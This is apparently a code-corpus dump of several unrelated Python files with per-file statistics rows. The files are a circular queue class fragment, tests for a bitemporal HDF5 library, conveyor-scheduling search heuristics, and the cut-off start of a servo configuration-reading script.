        self.last = (self.last + 1) % self.size
        self.items[self.last] = item
        self.length += 1
        self.computelength()

    def popfront(self):
        """Remove and return the oldest element.

        Shrinks the buffer when occupancy drops to a quarter.
        Raises ValueError when the queue is empty.
        BUG FIXES: the original compared against `size / 4` (a float),
        returned items[self.last] instead of the front element, and
        tested raw index arithmetic instead of the length.
        """
        if self.length == self.size // 4:
            self.deallocate()
        if self.length != 0:
            frontelement = self.items[self.first]
            self.first = (self.first + 1) % self.size
            self.length -= 1
            self.computelength()
            return frontelement
        raise ValueError("Queue is empty")

    def __iter__(self):
        """Yield elements from oldest to newest."""
        rlast = self.first + self.length
        for i in range(self.first, rlast):
            yield self.items[i % self.size]

    def allocate(self):
        """Double the buffer, compacting elements to the start."""
        newlength = 2 * self.size
        newQueue = [None] * newlength
        for i in range(self.size):
            pos = (i + self.first) % self.size
            newQueue[i] = self.items[pos]
        self.items = newQueue
        self.first = 0
        self.last = self.size - 1
        self.size = newlength
        self.computelength()

    def deallocate(self):
        """Halve the buffer (never below 1 slot), compacting elements.

        BUG FIX: `self.size / 2` produced a float, making
        `[None] * newlength` raise TypeError; also use the maintained
        count instead of the ambiguous index arithmetic.
        """
        newlength = max(1, self.size // 2)
        newQueue = [None] * newlength
        length = self.length
        for i in range(length):
            pos = (i + self.first) % self.size
            newQueue[i] = self.items[pos]
        self.items = newQueue
        self.first = 0
        self.last = length - 1
        self.size = newlength
        self.computelength()
| 28.815287
| 64
| 0.531388
| 543
| 4,524
| 4.395948
| 0.099448
| 0.110599
| 0.049016
| 0.064097
| 0.969418
| 0.940092
| 0.914956
| 0.914956
| 0.905739
| 0.905739
| 0
| 0.01512
| 0.356764
| 4,524
| 156
| 65
| 29
| 0.805155
| 0.011936
| 0
| 0.893939
| 0
| 0
| 0.018809
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.151515
| false
| 0
| 0
| 0
| 0.242424
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7dc40de9c452f1c21a0dc3b6419f4729dc50f0ac
| 3,075
|
py
|
Python
|
bth5/tests/test_dataset.py
|
Quansight/bitemporal-h5
|
faa323e25521381e3d770f48aa089ede1c7406fe
|
[
"BSD-3-Clause"
] | 3
|
2019-09-13T18:41:09.000Z
|
2019-09-14T02:58:49.000Z
|
bth5/tests/test_dataset.py
|
Quansight/bitemporal-h5
|
faa323e25521381e3d770f48aa089ede1c7406fe
|
[
"BSD-3-Clause"
] | 5
|
2019-09-05T14:21:59.000Z
|
2019-10-10T18:41:52.000Z
|
bth5/tests/test_dataset.py
|
Quansight/bitemporal-h5
|
faa323e25521381e3d770f48aa089ede1c7406fe
|
[
"BSD-3-Clause"
] | 2
|
2020-02-11T18:52:58.000Z
|
2021-04-17T15:39:04.000Z
|
"""tests basic dataset properties"""
import numpy as np
import bth5
import pytest
def test_write(tmp_path):
    """Round-trip two records and read them back by index and valid time."""
    path = tmp_path / "example.h5"
    t0 = np.datetime64("2018-06-21 12:26:47")
    t1 = np.datetime64("2018-06-21 12:26:48")
    with bth5.open(path, "/", "w", value_dtype=np.float64) as ds:
        ds.write(t0, 2.0)
        ds.write(t1, 1.0)
    with bth5.open(path, "/", "r") as ds:
        # Positional access.
        assert_recordvalidequal(ds.records[0], t0, 2.0)
        assert_recordvalidequal(ds.records[1], t1, 1.0)
        # Point lookup by valid time.
        assert_recordvalidequal(ds.valid_times[t0], t0, 2.0)
        assert_recordvalidequal(ds.valid_times[t1], t1, 1.0)
        # Range lookup by valid-time slice.
        upper = np.datetime64("2018-06-21 12:26:49")
        window = ds.valid_times[t0:upper]
        assert_recordvalidequal(window[0], t0, 2.0)
        assert_recordvalidequal(window[1], t1, 1.0)
def test_invalid_order(tmp_path):
    """Records written out of chronological order read back sorted."""
    path = tmp_path / "example.h5"
    earlier = np.datetime64("2018-06-21 12:26:47")
    later = np.datetime64("2018-06-21 12:26:48")
    with bth5.open(path, "/", "w", value_dtype=np.float64) as ds:
        # Deliberately write the later timestamp first.
        ds.write(later, 2.0)
        ds.write(earlier, 1.0)
    with bth5.open(path, "/", "r") as ds:
        assert_recordvalidequal(ds.records[0], earlier, 1.0)
        assert_recordvalidequal(ds.records[1], later, 2.0)
def test_interpolate(tmp_path):
    """Interpolating halfway between two points yields their midpoint."""
    path = tmp_path / "example.h5"
    with bth5.open(path, "/", "w", value_dtype=np.float64) as ds:
        ds.write(np.datetime64("2018-06-21 12:26:47"), 2.0)
        ds.write(np.datetime64("2018-06-21 12:26:49"), 1.0)
    with bth5.open(path, "/", "r") as ds:
        # One second between the two samples: midpoint of 2.0 and 1.0.
        assert ds.interpolate_values("2018-06-21 12:26:48") == 1.5
def test_deduplication(tmp_path):
    """Rewriting an existing valid time supersedes the earlier value."""
    path = tmp_path / "example.h5"
    dup_time = np.datetime64("2018-06-21 12:26:49")
    with bth5.open(path, "/", "w", value_dtype=np.float64) as ds:
        ds.write(np.datetime64("2018-06-21 12:26:47"), 2.0)
        ds.write(dup_time, 1.0)
    with bth5.open(path, "/", "a") as ds:
        ds.write(dup_time, 3.0)
        ds.write(np.datetime64("2018-06-21 12:26:51"), 1.0)
    with bth5.open(path, "/", "r") as ds:
        window = ds.valid_times[
            np.datetime64("2018-06-21 12:26:47"):
            np.datetime64("2018-06-21 12:26:52")
        ]
        # Four writes, but the duplicate valid time collapses to one record.
        assert len(window) == 3
        assert_recordvalidequal(window[1], dup_time, 3.0)
def assert_recordvalidequal(record, valid_time, value):
    """Assert that *record* carries the expected valid time and value.

    Also checks the record received a real transaction id.
    """
    expected = {"valid_time": valid_time, "value": value}
    for field, want in expected.items():
        assert record[field] == want
    # A transaction id of -1 would mean the write was never committed.
    assert record["transaction_id"] != -1
| 37.5
| 87
| 0.597724
| 485
| 3,075
| 3.705155
| 0.117526
| 0.086811
| 0.115748
| 0.144686
| 0.821925
| 0.821925
| 0.821925
| 0.813578
| 0.811352
| 0.811352
| 0
| 0.204252
| 0.219837
| 3,075
| 81
| 88
| 37.962963
| 0.54481
| 0.009756
| 0
| 0.333333
| 0
| 0
| 0.207634
| 0
| 0
| 0
| 0
| 0
| 0.238095
| 1
| 0.079365
| false
| 0
| 0.047619
| 0
| 0.126984
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7de8143daa8501cfed6db699de304225f13e0203
| 17,483
|
py
|
Python
|
conveyor/method.py
|
cscUOU/Shipyard-process-optimization
|
cefddd2e953ab6b685771d3c388ae46c7d06bdf3
|
[
"Apache-2.0"
] | null | null | null |
conveyor/method.py
|
cscUOU/Shipyard-process-optimization
|
cefddd2e953ab6b685771d3c388ae46c7d06bdf3
|
[
"Apache-2.0"
] | null | null | null |
conveyor/method.py
|
cscUOU/Shipyard-process-optimization
|
cefddd2e953ab6b685771d3c388ae46c7d06bdf3
|
[
"Apache-2.0"
] | null | null | null |
def bubble_search(works):
    """Greedy pairwise-swap (bubble) local search over the work order.

    Repeatedly tries swapping each adjacent pair of works; a swap is
    kept only when it lowers the total conveyor time, and sweeps repeat
    until a full pass brings no improvement.

    `works` is a sequence of dicts with a "time" entry (per-process
    durations).  Relies on module-level helpers `get_conveyor`,
    `cal_conveyor_time` and `swap` defined elsewhere in this module --
    their exact semantics are not visible here.

    Returns the (reordered) works array and a stats list:
    [best conveyor time, iterations, elapsed seconds, effective moves,
    iteration of best solution, time of best solution].
    """
    works = np.array([work["time"] for work in works])
    n_work, n_process_seq = works.shape
    conveyor, conveyor_mask = get_conveyor(works)
    _, n_seq = conveyor.shape
    best_conveyor_time = cal_conveyor_time(conveyor)
    # Bookkeeping for the returned statistics.
    performance = 0
    _iter = 0
    _time = 0
    _n_effective = 0
    best_iter = 0
    best_time = 0
    start_time = time.time()
    while True:
        tmp_best_conveyor_time = best_conveyor_time
        for i in range(n_work-1):
            _iter += 1
            swap(works, conveyor, i, i+1)
            tmp_conveyor_time = cal_conveyor_time(conveyor)
            if best_conveyor_time > tmp_conveyor_time:
                _n_effective += 1
                best_iter = _iter
                best_time = time.time() - start_time
                best_conveyor_time = tmp_conveyor_time
            else:
                # Not an improvement: undo the swap.
                swap(works, conveyor, i, i+1)
        if tmp_best_conveyor_time == best_conveyor_time:
            # No improvement in a full sweep: local optimum reached.
            break
        else:
            continue
    performance = best_conveyor_time
    _time = time.time() - start_time
    return works, [performance, _iter, _time, _n_effective, best_iter, best_time]
def random_search(works):
    """Random restarts: shuffle the work order MAX_ITER times, keep best.

    `works` is a sequence of dicts with a "time" entry.  Uses the
    module-level `MAX_ITER`, `get_conveyor` and `cal_conveyor_time`
    helpers defined elsewhere in this module.

    Returns the works array after the LAST shuffle (NOTE(review): not
    `best_works`, even though the best order is tracked -- confirm this
    is intentional) and a stats list:
    [best conveyor time, iterations, elapsed seconds, effective moves,
    iteration of best solution, time of best solution].
    """
    works = np.array([work["time"] for work in works])
    # NOTE(review): redundant re-wrap, works is already an ndarray.
    works = np.array(works)
    n_works, n_process_seq = works.shape
    conveyor, conveyor_mask = get_conveyor(works)
    _, n_seq = conveyor.shape
    best_conveyor_time = cal_conveyor_time(conveyor)
    best_works = np.copy(works)
    index = np.arange(n_works)
    # Bookkeeping for the returned statistics.
    performance = 0
    _iter = 0
    _time = 0
    _n_effective = 0
    best_iter = 0
    best_time = 0
    start_time = time.time()
    for i in range(MAX_ITER):
        _iter += 1
        np.random.shuffle(index)
        works = works[index]
        conveyor, _ = get_conveyor(works)
        tmp_conveyor_time = cal_conveyor_time(conveyor)
        if best_conveyor_time > tmp_conveyor_time:
            _n_effective += 1
            best_iter = _iter
            best_time = time.time() - start_time
            best_conveyor_time = tmp_conveyor_time
            best_works = np.copy(works)
    performance = best_conveyor_time
    _time = time.time() - start_time
    return works, [performance, _iter, _time, _n_effective, best_iter, best_time]
def random_bubble_search(works):
    """Random-restart bubble search: shuffle the work order, run an
    adjacent-swap descent to a local optimum, repeat MAX_ITER times,
    and keep the best ordering found across all restarts.

    :param works: list of dicts, each with a "time" entry (per-process
        duration sequence).
    :return: (best_works, [performance, iterations, wall_time,
        effective_moves, iter_of_best, time_of_best])
    """
    works = np.array([work["time"] for work in works])
    n_work, _ = works.shape
    conveyor, conveyor_mask = get_conveyor(works)
    best_conveyor_time = cal_conveyor_time(conveyor)
    best_works = np.copy(works)
    index = np.arange(n_work)
    _iter = 0
    _n_effective = 0
    best_iter = 0
    best_time = 0
    start_time = time.time()
    for _restart in range(MAX_ITER):
        np.random.shuffle(index)
        works = works[index]
        conveyor, conveyor_mask = get_conveyor(works)
        # Local descent only records swaps that do not worsen the best
        # time seen so far across ALL restarts (>= accepts ties).
        tmp_best_conveyor_time = best_conveyor_time
        _iter += 1
        while True:
            before_best_conveyor_time = tmp_best_conveyor_time
            for j in range(n_work - 1):  # renamed from `i`: was shadowing the restart index
                swap(works, conveyor, j, j + 1)
                tmp_conveyor_time = cal_conveyor_time(conveyor)
                if tmp_best_conveyor_time >= tmp_conveyor_time:
                    _n_effective += 1
                    best_iter = _iter
                    best_time = time.time() - start_time
                    tmp_best_conveyor_time = tmp_conveyor_time
                else:
                    swap(works, conveyor, j, j + 1)  # undo worsening swap
            if before_best_conveyor_time == tmp_best_conveyor_time:
                break  # full sweep without improvement: local optimum
        if best_conveyor_time > tmp_best_conveyor_time:
            best_conveyor_time = tmp_best_conveyor_time
            best_works = np.copy(works)
    performance = best_conveyor_time
    _time = time.time() - start_time
    # BUG FIX: previously returned `works` (the last restart's order),
    # not the tracked best ordering.
    return best_works, [performance, _iter, _time, _n_effective, best_iter, best_time]
def unidev_search_half(works):
    """Stochastic swap search ("half" variant of unidev_search).

    Each iteration picks one work uniformly at random, then chooses a
    swap partner via an inverse roulette wheel over the deviation of
    the two works from the per-position process means, keeping the swap
    only when it shortens the total conveyor time.

    :param works: either a list of dicts with a "time" entry, or a
        plain 2-D array of per-process durations.
    :return: (best_works, [performance, iterations, wall_time,
        effective_moves, iter_of_best, time_of_best, time_collector])
        where time_collector holds per-phase timing instrumentation.
    """
    if type(works[0]) is dict:
        works = np.array([work["time"] for work in works])
    works = np.array(works)
    n_work, n_process_seq = works.shape
    conveyor, conveyor_mask = get_conveyor(works)
    count = 0
    process_count = np.sum(conveyor_mask, axis=0)
    best_conveyor_time = cal_conveyor_time(conveyor)
    # BUG FIX: best_works must exist even when no swap ever improves,
    # otherwise the final `return best_works` raises UnboundLocalError.
    best_works = np.copy(works)
    _iter = 0
    _n_effective = 0
    best_iter = 0
    best_time = 0
    start_time = time.time()
    time_collector = [[], [], []]  # phase timings: means / choice / error scan
    while True:
        _iter += 1
        time_collect = time.time()
        process_sum = np.sum(conveyor, axis=0)
        process_mean = process_sum / process_count
        time_collector[0].append(time.time() - time_collect)
        time_collect = time.time()
        # Unlike unidev_search, the first work is chosen uniformly
        # (the deviation-weighted selection was removed).
        work_choice = np.random.choice(np.arange(n_work), 1)[0]
        time_collector[1].append(time.time() - time_collect)
        time_collect = time.time()
        error_collect = []
        for i in range(n_work):
            error1 = sum(np.absolute(process_mean[i:i+n_process_seq] - works[work_choice]))
            error2 = sum(np.absolute(process_mean[work_choice:work_choice+n_process_seq] - works[i]))
            error_collect.append(error1 + error2)
        # Inverse roulette wheel: lower error -> higher swap probability.
        swap_probability = roulette_wheel(error_collect, True)
        swap_choice = np.random.choice(range(n_work), 1, p=swap_probability)[0]
        time_collector[2].append(time.time() - time_collect)
        swap(works, conveyor, work_choice, swap_choice)
        count += 1
        tmp_conveyor_time = cal_conveyor_time(conveyor)
        if best_conveyor_time > tmp_conveyor_time:
            _n_effective += 1
            best_iter = _iter
            best_time = time.time() - start_time
            best_conveyor_time = tmp_conveyor_time
            best_works = np.copy(works)
        else:
            swap(works, conveyor, work_choice, swap_choice)  # undo
        if count == MAX_ITER:
            break
    performance = best_conveyor_time
    _time = time.time() - start_time
    return best_works, [performance, _iter, _time, _n_effective, best_iter, best_time, time_collector]
def unidev_search(works):
    """Uniform-deviation stochastic swap search.

    Each iteration:
      1. picks a conveyor sequence slot with probability proportional to
         the mean absolute deviation of work times at that slot,
      2. picks the work occupying that slot (deviation-weighted when the
         slot is shared by several works),
      3. picks a swap partner whose times best fit the process means
         (inverse roulette wheel), and
      4. keeps the swap only if it shortens the total conveyor time.

    :param works: either a list of dicts with a "time" entry, or a
        plain 2-D array of per-process durations.
    :return: (best_works, [performance, iterations, wall_time,
        effective_moves, iter_of_best, time_of_best, time_collector])
    """
    if type(works[0]) is dict:
        works = np.array([work["time"] for work in works])
    works = np.array(works)
    n_work, n_process_seq = works.shape
    conveyor, conveyor_mask = get_conveyor(works)
    _, n_seq = conveyor.shape
    count = 0
    process_count = np.sum(conveyor_mask, axis=0)
    best_conveyor_time = cal_conveyor_time(conveyor)
    # BUG FIX: initialise best_works so the function cannot raise
    # UnboundLocalError when no iteration improves on the initial order.
    best_works = np.copy(works)
    _iter = 0
    _n_effective = 0
    best_iter = 0
    best_time = 0
    start_time = time.time()
    time_collector = [[], [], []]  # phase timings: deviation / choice / error scan
    while True:
        _iter += 1
        time_collect = time.time()
        process_sum = np.sum(conveyor, axis=0)
        process_mean = process_sum / process_count
        # Absolute deviation of each occupied cell from its slot mean.
        process_deviation = np.copy(conveyor)
        for i in range(n_seq):
            process_deviation[conveyor_mask[:, i] > 0, i] -= process_mean[i]
        process_deviation = np.absolute(process_deviation)
        process_deviation_sum = np.sum(process_deviation, axis=0)
        process_deviation_mean = nan_to_zero(process_deviation_sum / process_count)
        seq_probability = roulette_wheel(process_deviation_mean)
        seq_choice = np.random.choice(n_seq, 1, p=seq_probability)[0]
        time_collector[0].append(time.time() - time_collect)
        time_collect = time.time()
        work_index = [i for i, cm in enumerate(conveyor_mask[:, seq_choice]) if cm == 1]
        if len(work_index) == 1:
            work_choice = work_index[0]
        else:
            work_probability = roulette_wheel(process_deviation[conveyor_mask[:, seq_choice] > 0, seq_choice])
            work_choice = np.random.choice(work_index, 1, p=work_probability)[0]
        time_collector[1].append(time.time() - time_collect)
        time_collect = time.time()
        error_collect = []
        for i in range(n_work):
            error1 = sum(np.absolute(process_mean[i:i+n_process_seq] - works[work_choice]))
            error2 = sum(np.absolute(process_mean[work_choice:work_choice+n_process_seq] - works[i]))
            error_collect.append(error1 + error2)
        swap_probability = roulette_wheel(error_collect, True)
        swap_choice = np.random.choice(range(n_work), 1, p=swap_probability)[0]
        time_collector[2].append(time.time() - time_collect)
        swap(works, conveyor, work_choice, swap_choice)
        count += 1
        tmp_conveyor_time = cal_conveyor_time(conveyor)
        if best_conveyor_time > tmp_conveyor_time:
            _n_effective += 1
            best_iter = _iter
            best_time = time.time() - start_time
            best_conveyor_time = tmp_conveyor_time
            best_works = np.copy(works)
        else:
            swap(works, conveyor, work_choice, swap_choice)  # undo
        if count == MAX_ITER:
            break
    # Debug instrumentation retained from the original implementation.
    print(n_work, n_process_seq)
    print(np.mean(time_collector, axis=1))
    performance = best_conveyor_time
    _time = time.time() - start_time
    return best_works, [performance, _iter, _time, _n_effective, best_iter, best_time, time_collector]
def unidev_search_simulated_anealing(works):
    """Simulated-annealing variant of unidev_search.

    Candidate swaps are generated exactly as in unidev_search. A swap
    that does not worsen the conveyor time is always accepted; a
    worsening swap is accepted stochastically while the temperature T
    is geometrically cooled (T <- c*T). Terminates when the acceptance
    probability exp(-delta/(k*T)) underflows to 0.

    :param works: list of dicts, each with a "time" entry.
    :return: (best_works, [performance, iterations, wall_time,
        effective_moves, iter_of_best, time_of_best])
    """
    works = np.array([work["time"] for work in works])
    n_work, n_process_seq = works.shape
    conveyor, conveyor_mask = get_conveyor(works)
    _, n_seq = conveyor.shape
    process_count = np.sum(conveyor_mask, axis=0)
    best_conveyor_time = cal_conveyor_time(conveyor)
    # BUG FIX: initialise best_works so the final return cannot raise
    # UnboundLocalError when no candidate ever beats the initial order.
    best_works = np.copy(works)
    before_conveyor_time = best_conveyor_time
    T = before_conveyor_time  # initial temperature = initial makespan
    k = 1.0                   # Boltzmann-like scaling constant
    c = 0.99                  # geometric cooling rate
    _iter = 0
    _n_effective = 0
    best_iter = 0
    best_time = 0
    start_time = time.time()
    while True:
        _iter += 1
        process_sum = np.sum(conveyor, axis=0)
        process_mean = process_sum / process_count
        process_deviation = np.copy(conveyor)
        for i in range(n_seq):
            process_deviation[conveyor_mask[:, i] > 0, i] -= process_mean[i]
        process_deviation = np.absolute(process_deviation)
        process_deviation_sum = np.sum(process_deviation, axis=0)
        process_deviation_mean = nan_to_zero(process_deviation_sum / process_count)
        seq_probability = roulette_wheel(process_deviation_mean)
        seq_choice = np.random.choice(n_seq, 1, p=seq_probability)[0]
        work_index = [i for i, cm in enumerate(conveyor_mask[:, seq_choice]) if cm == 1]
        if len(work_index) == 1:
            work_choice = work_index[0]
        else:
            work_probability = roulette_wheel(process_deviation[conveyor_mask[:, seq_choice] > 0, seq_choice])
            work_choice = np.random.choice(work_index, 1, p=work_probability)[0]
        error_collect = []
        for i in range(n_work):
            error1 = sum(np.absolute(process_mean[i:i+n_process_seq] - works[work_choice]))
            error2 = sum(np.absolute(process_mean[work_choice:work_choice+n_process_seq] - works[i]))
            error_collect.append(error1 + error2)
        swap_probability = roulette_wheel(error_collect, True)
        swap_choice = np.random.choice(range(n_work), 1, p=swap_probability)[0]
        swap(works, conveyor, work_choice, swap_choice)
        tmp_conveyor_time = cal_conveyor_time(conveyor)
        if best_conveyor_time > tmp_conveyor_time:
            _n_effective += 1
            best_iter = _iter
            best_time = time.time() - start_time
            best_conveyor_time = tmp_conveyor_time
            best_works = np.copy(works)
        delta = tmp_conveyor_time - before_conveyor_time
        if delta <= 0:
            before_conveyor_time = tmp_conveyor_time
        else:
            p = np.exp(-(delta / (k * T)))
            if p == 0:
                break  # temperature exhausted: acceptance underflowed
            # NOTE(review): classic Metropolis accepts a worse move when
            # rand() < p; this accepts when rand() > p, i.e. worse moves
            # become MORE likely as T falls. Preserved as-is — confirm
            # against the intended algorithm before changing.
            if np.random.rand() > p:
                before_conveyor_time = tmp_conveyor_time
            else:
                swap(works, conveyor, work_choice, swap_choice)  # undo
        T = c * T
    performance = best_conveyor_time
    _time = time.time() - start_time
    return best_works, [performance, _iter, _time, _n_effective, best_iter, best_time]
def simulated_anealing(works, mode):
    # Group-based simulated annealing over the work order: works are
    # partitioned into consecutive groups of 5 and candidate moves swap
    # members WITHIN a group only.
    works = np.array([work["time"] for work in works])
    """
    mode : 0 // single change, pairwise interchange
    mode : 1 // multiple change, pairwise interchange
    mode : 2 // single change, adjacent interchange
    mode : 3 // multiple change, adjacent interchange
    """
    # NOTE(review): the string above (a no-op expression, not a real
    # docstring — it follows the first statement) does not match the code
    # below: modes 0/2 perform random pairwise interchanges, modes 1/3
    # adjacent interchanges; modes 2/3 apply one move per group. Confirm
    # the intended labels.
    works = np.array(works)
    n_work, n_process_seq = works.shape
    n_group = n_work//5  # fixed group size of 5
    conveyor, conveyor_mask = get_conveyor(works)
    _, n_seq = conveyor.shape
    current_work = np.copy(works)
    current_conveyor, _ = get_conveyor(current_work)
    current_score = cal_conveyor_time(current_conveyor)
    best_works = np.copy(current_work)
    best_conveyor_time = current_score
    n = 0  # move counter; also drives the cooling schedule below
    performance = 0
    _iter = 0
    _time = 0
    _n_effective = 0
    best_iter = 0
    best_time = 0
    start_time = time.time()
    while True:
        _iter += 1
        candidate_work = np.copy(current_work)
        candidate_conveyor = np.copy(current_conveyor)
        if mode == 0:
            # Random pairwise interchange inside ONE random group.
            group_select = np.random.randint(n_group)
            group_size = len(works[group_select*5:(group_select+1)*5])
            member_select1 = np.random.randint(group_size)
            member_select2 = np.random.randint(group_size)
            swap(candidate_work, candidate_conveyor, group_select*5+member_select1, group_select*5+member_select2)
        elif mode == 1:
            # Adjacent interchange inside ONE random group; drawing
            # member_select1 == group_size means "no move" this round.
            group_select = np.random.randint(n_group)
            group_size = len(works[group_select*5:(group_select+1)*5])
            member_select1= np.random.randint(group_size+1)
            if member_select1 != group_size:
                member_select2 = member_select1-1 if member_select1 != 0 else group_size-1
                swap(candidate_work, candidate_conveyor, group_select*5+member_select1, group_select*5+member_select2)
        elif mode == 2:
            # One random pairwise interchange in EVERY group.
            for i in range(n_group):
                group_select = i
                group_size = len(works[group_select*5:(group_select+1)*5])
                member_select1 = np.random.randint(group_size)
                member_select2 = np.random.randint(group_size)
                swap(candidate_work, candidate_conveyor, group_select*5+member_select1, group_select*5+member_select2)
        elif mode == 3:
            # One adjacent interchange (possibly skipped) in EVERY group.
            for i in range(n_group):
                group_select = i
                group_size = len(works[group_select*5:(group_select+1)*5])
                member_select1= np.random.randint(group_size+1)
                if member_select1 != group_size:
                    member_select2 = member_select1-1 if member_select1 != 0 else group_size-1
                    swap(candidate_work, candidate_conveyor, group_select*5+member_select1, group_select*5+member_select2)
        candidate_score = cal_conveyor_time(candidate_conveyor)
        # delta = current_score - candidate_score
        delta = candidate_score - current_score  # > 0 means candidate is worse
        # Cooling schedule: T shrinks as n grows (for positive delta).
        # NOTE(review): for delta < 0 with large n, log(2+delta*n) can hit
        # a non-positive argument (nan/inf) — verify intended behaviour.
        T = np.log(2)/np.log(2+delta*n)
        u = np.random.random()
        # exp(log(2)/T) == 2 + delta*n, so this branch (reject / check
        # termination) is taken unless 2 + delta*n <= u, i.e. candidates
        # are only ADOPTED for sufficiently improving moves late in the
        # run — presumably intentional; confirm against the source paper.
        if u < np.exp(np.log(2)/T):
            if n >= MAX_ITER:
                break
        else:
            current_work = np.copy(candidate_work)
            current_conveyor = np.copy(candidate_conveyor)
            current_score = candidate_score
        if best_conveyor_time > current_score:
            _n_effective += 1
            best_iter = _iter
            best_time = time.time() - start_time
            best_works = np.copy(current_work)
            best_conveyor_time = current_score
        n += 1
    performance = best_conveyor_time
    _time = time.time() - start_time
    return best_works, [performance, _iter, _time, _n_effective, best_iter, best_time]
def grid(works, works_type):
    """Type-aware greedy ordering with random restarts.

    Precomputes, for every work type and every look-back offset, the
    other types ranked by time-profile similarity (euclidean distance
    between shifted time profiles), then greedily rebuilds the order
    position by position, scoring candidate types against the recently
    placed works. The whole construction is restarted MAX_ITER times
    from random shuffles and the best result is kept.

    :param works: list of dicts with "time" and "type" entries.
    :param works_type: mapping type-key -> {"time": ..., "sort": [[...]]};
        the "sort" rank tables are filled in here (mutated in place).
    :return: (best_works, [performance, iterations, wall_time,
        effective_moves, iter_of_best, time_of_best])
    """
    works_type_keys = list(works_type.keys())
    works_type_list = [work["type"] for work in works]
    works = np.array([work["time"] for work in works])
    n_work, n_process_seq = works.shape
    conveyor, conveyor_mask = get_conveyor(works)
    _, n_seq = conveyor.shape
    best_conveyor_time = cal_conveyor_time(conveyor)
    best_works = np.copy(works)
    index = np.arange(n_work)
    _iter = 0
    _n_effective = 0
    best_iter = 0
    best_time = 0
    # Precompute similarity rankings per type and per offset.
    for wtk in works_type_keys:
        for i in range(N_PROCESS-1):
            work_name = []
            time_diff = []
            for wtk_ in works_type_keys:
                work_name.append(wtk_)
                time_diff.append(euclidean(works_type[wtk]["time"][(1+i):], works_type[wtk_]["time"][:-(1+i)]))
            argsort_wtd = np.argsort(time_diff)
            for aw in argsort_wtd:
                works_type[wtk]["sort"][i].append(work_name[aw])
    start_time = time.time()
    for i in range(MAX_ITER):
        _iter += 1
        # Random restart: shuffle works and the parallel type list.
        np.random.shuffle(index)
        works = works[index]
        works_type_list = [works_type_list[i_] for i_ in index]
        # Remaining count of each type among the yet-unplaced works.
        works_type_count = [0 for wtk in works_type_keys]
        for wtl in works_type_list:
            works_type_count[works_type_keys.index(wtl)] += 1
        for j in range(n_work-1):
            works_type_score = [0 for wtk in works_type_keys]
            if j == 0:
                # No predecessor yet: score types by overall rank sums.
                for wtk in works_type_keys:
                    for works_type_sort in works_type[wtk]["sort"]:
                        for k, wts in enumerate(works_type_sort):
                            works_type_score[works_type_keys.index(wts)] += k
            else:
                # Score candidates against the last min(j, N_PROCESS-1)
                # placed works; closer ranks weigh more.
                for k in range(j if N_PROCESS-1>j else N_PROCESS-1):
                    for l, wts in enumerate(works_type[works_type_list[j-k-1]]["sort"][k]):
                        works_type_score[works_type_keys.index(wts)] += len(works_type_keys)-(l+1)
            am = np.argmax(np.array(works_type_count)*np.array(works_type_score))
            # Move the first unplaced work of the winning type into slot j.
            for k in range(j, n_work):
                if works_type_list[k] == works_type_keys[am]:
                    break
            # BUG FIX: `works[j], works[k] = works[k], works[j]` does NOT
            # swap numpy rows (the RHS holds views, so row k was left
            # unchanged). Fancy indexing copies and swaps correctly.
            works[[j, k]] = works[[k, j]]
            works_type_list[j], works_type_list[k] = works_type_list[k], works_type_list[j]
            works_type_count[works_type_keys.index(works_type_list[j])] -= 1
        conveyor, _ = get_conveyor(works)
        tmp_conveyor_time = cal_conveyor_time(conveyor)
        if best_conveyor_time > tmp_conveyor_time:
            _n_effective += 1
            best_iter = _iter
            best_time = time.time() - start_time
            best_conveyor_time = tmp_conveyor_time
            best_works = np.copy(works)
    performance = best_conveyor_time
    _time = time.time() - start_time
    return best_works, [performance, _iter, _time, _n_effective, best_iter, best_time]
| 30.247405
| 107
| 0.730824
| 2,676
| 17,483
| 4.43423
| 0.045964
| 0.093039
| 0.063374
| 0.028822
| 0.889938
| 0.872661
| 0.857071
| 0.830861
| 0.802966
| 0.796056
| 0
| 0.015426
| 0.158325
| 17,483
| 577
| 108
| 30.299827
| 0.790962
| 0.065835
| 0
| 0.817352
| 0
| 0
| 0.003482
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018265
| false
| 0.004566
| 0
| 0
| 0.03653
| 0.004566
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7dee1dc70ba226b86a2b0d2fcbd05afab1477ed0
| 5,214
|
py
|
Python
|
restore_config.py
|
FourierDynamics/FourierDynamics-aios_python_example
|
dc0b69d72fe6896ceab816f2b9508a1d9c6b25f1
|
[
"MIT"
] | 2
|
2021-01-09T13:21:00.000Z
|
2021-05-05T01:30:10.000Z
|
restore_config.py
|
FourierDynamics/FourierDynamics-aios_python_example
|
dc0b69d72fe6896ceab816f2b9508a1d9c6b25f1
|
[
"MIT"
] | null | null | null |
restore_config.py
|
FourierDynamics/FourierDynamics-aios_python_example
|
dc0b69d72fe6896ceab816f2b9508a1d9c6b25f1
|
[
"MIT"
] | 2
|
2021-03-19T08:21:06.000Z
|
2021-06-11T06:01:14.000Z
|
import aios
import time
import threading
import numpy as np
# Default server address. NOTE: main() assigns its own local
# Server_IP_list from aios.broadcast_func(), so this module-level value
# is only a documented fallback/example and is not used by main().
Server_IP_list = ['192.168.5.81']
def main():
    """Read back the current configuration of every discovered AIOS servo.

    Broadcasts to discover reachable servers, then issues a passthrough
    read ("r <attribute>\\n") for each configuration attribute on every
    server. (The corresponding write commands used to restore a known
    configuration were left commented out in the original and are
    intentionally omitted here.)
    """
    Server_IP_list = aios.broadcast_func()
    if Server_IP_list:
        # Attributes read back from each server, in the original order.
        # The second 'axis1.controller.config.vel_limit' entry reproduces
